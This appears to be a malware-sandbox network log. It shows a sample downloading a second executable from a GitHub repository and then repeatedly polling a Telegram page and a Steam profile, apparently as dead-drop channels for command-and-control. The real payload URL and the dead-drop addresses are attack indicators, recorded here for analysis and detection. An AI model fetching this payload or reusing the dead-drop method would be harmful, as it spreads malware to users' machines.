Dec 23, 2024 09:01:07.199862003 CET | 52259 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 09:01:07.337776899 CET | 53 | 52259 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 09:01:10.467531919 CET | 65484 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 09:01:10.604655981 CET | 53 | 65484 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 09:01:14.429311991 CET | 62207 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 09:01:14.566379070 CET | 53 | 62207 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 09:01:16.507158041 CET | 50963 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 09:01:16.646045923 CET | 53 | 50963 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 09:01:07.199862003 CET | 192.168.2.4 | 1.1.1.1 | 0x4530 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:01:10.467531919 CET | 192.168.2.4 | 1.1.1.1 | 0xf5d0 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:01:14.429311991 CET | 192.168.2.4 | 1.1.1.1 | 0xd6e2 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:01:16.507158041 CET | 192.168.2.4 | 1.1.1.1 | 0xf0d0 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 09:01:07.337776899 CET | 1.1.1.1 | 192.168.2.4 | 0x4530 | No error (0) | github.com | | 20.233.83.145 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:01:10.604655981 CET | 1.1.1.1 | 192.168.2.4 | 0xf5d0 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:01:10.604655981 CET | 1.1.1.1 | 192.168.2.4 | 0xf5d0 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:01:10.604655981 CET | 1.1.1.1 | 192.168.2.4 | 0xf5d0 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:01:10.604655981 CET | 1.1.1.1 | 192.168.2.4 | 0xf5d0 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:01:14.566379070 CET | 1.1.1.1 | 192.168.2.4 | 0xd6e2 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:01:16.646045923 CET | 1.1.1.1 | 192.168.2.4 | 0xf0d0 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
• github.com
• raw.githubusercontent.com
• t.me
• steamcommunity.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49772 | 20.233.83.145 | 443 | 7424 | C:\Users\user\Desktop\YYjRtxS70h.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:01:09 UTC | 114 | OUT | GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive
2024-12-23 08:01:10 UTC | 565 | IN | HTTP/1.1 302 Found
Server: GitHub.com
Date: Mon, 23 Dec 2024 08:01:10 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
2024-12-23 08:01:10 UTC | 3390 | IN | Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
2024-12-23 08:01:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49778 | 185.199.109.133 | 443 | 7424 | C:\Users\user\Desktop\YYjRtxS70h.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:01:11 UTC | 125 | OUT | GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-12-23 08:01:12 UTC | 903 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 476160
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "fab0c349a347a91ca7e8afd2bad974668e7a1ce50c0b2f5ed6f73ab561c31a75"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 2C05:14CB39:1A23151:1D72A5D:676918C7
Accept-Ranges: bytes
Date: Mon, 23 Dec 2024 08:01:12 GMT
Via: 1.1 varnish
X-Served-By: cache-ewr-kewr1740026-EWR
                                                                                                                                                                                                                    X-Cache: MISS
                                                                                                                                                                                                                    X-Cache-Hits: 0
                                                                                                                                                                                                                    X-Timer: S1734940872.101090,VS0,VE78
                                                                                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                    X-Fastly-Request-ID: dde14fb065305dce11382898a37d851b5201586a
                                                                                                                                                                                                                    Expires: Mon, 23 Dec 2024 08:06:12 GMT
                                                                                                                                                                                                                    Source-Age: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49789        149.154.167.99  443               7672  C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-23 08:01:15 UTC  85   OUT  GET /m3wm0w HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 08:01:16 UTC  511  IN   HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 23 Dec 2024 08:01:16 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 9539
    Connection: close
    Set-Cookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155; expires=Tue, 24 Dec 2024 08:01:16 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  49795        104.102.49.254  443               7672  C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-23 08:01:18 UTC  119   OUT  GET /profiles/76561199804377619 HTTP/1.1
    Host: steamcommunity.com
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 08:01:18 UTC  1917  IN   HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Mon, 23 Dec 2024 08:01:18 GMT
    Content-Length: 35590
    Connection: close
    Set-Cookie: sessionid=b089793df7dc153c4e38a65c; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                    Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
4  192.168.2.4  49869  149.154.167.99  443  7672  C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-23 08:01:52 UTC  144  OUT  GET /m3wm0w HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
2024-12-23 08:01:53 UTC  368  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 23 Dec 2024 08:01:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9538
Connection: close
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-23 08:01:53 UTC  9538  IN  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
5  192.168.2.4  49874  104.102.49.254  443  7672  C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-23 08:01:54 UTC  215  OUT  GET /profiles/76561199804377619 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: sessionid=b089793df7dc153c4e38a65c; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
2024-12-23 08:01:55 UTC  1733  IN  HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 23 Dec 2024 08:01:55 GMT
Content-Length: 35590
Connection: close
2024-12-23 08:01:55 UTC  14651  IN  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-23 08:01:55 UTC  16384  IN  Data Raw: 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74
Data Ascii: Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About
2024-12-23 08:01:55 UTC  3584  IN  Data Raw: 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 38 30 34 33 37 37 36 31 39 2f 62 61 64 67 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 22 3e 4c 65 76 65 6c 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 20 6c 76 6c 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 4e 75 6d 22 3e 30 3c
Data Ascii: OnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199804377619/badges"><div class="persona_name persona_level">Level <div class="friendPlayerLevel lvl_0"><span class="friendPlayerLevelNum">0<
2024-12-23 08:01:55 UTC  971  IN  Data Raw: 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69
Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
6  192.168.2.4  49952  149.154.167.99  443  7672  C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-23 08:02:29 UTC  144  OUT  GET /m3wm0w HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
2024-12-23 08:02:29 UTC  368  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 23 Dec 2024 08:02:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9539
Connection: close
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-23 08:02:29 UTC  9539  IN  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
7  192.168.2.4  49958  104.102.49.254  443  7672  C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-23 08:02:31 UTC  215  OUT  GET /profiles/76561199804377619 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: sessionid=b089793df7dc153c4e38a65c; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
2024-12-23 08:02:31 UTC  1733  IN  HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 23 Dec 2024 08:02:31 GMT
Content-Length: 35590
Connection: close
2024-12-23 08:02:31 UTC  14651  IN  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-23 08:02:32 UTC  16384  IN  Data Raw: 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74
                                                                                                                                                                                                                    Data Ascii: Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About
                                                                                                                                                                                                                    2024-12-23 08:02:32 UTC3584INData Raw: 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 38 30 34 33 37 37 36 31 39 2f 62 61 64 67 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 22 3e 4c 65 76 65 6c 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 20 6c 76 6c 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 4e 75 6d 22 3e 30 3c
                                                                                                                                                                                                                    Data Ascii: OnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199804377619/badges"><div class="persona_name persona_level">Level <div class="friendPlayerLevel lvl_0"><span class="friendPlayerLevelNum">0<
                                                                                                                                                                                                                    2024-12-23 08:02:32 UTC971INData Raw: 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 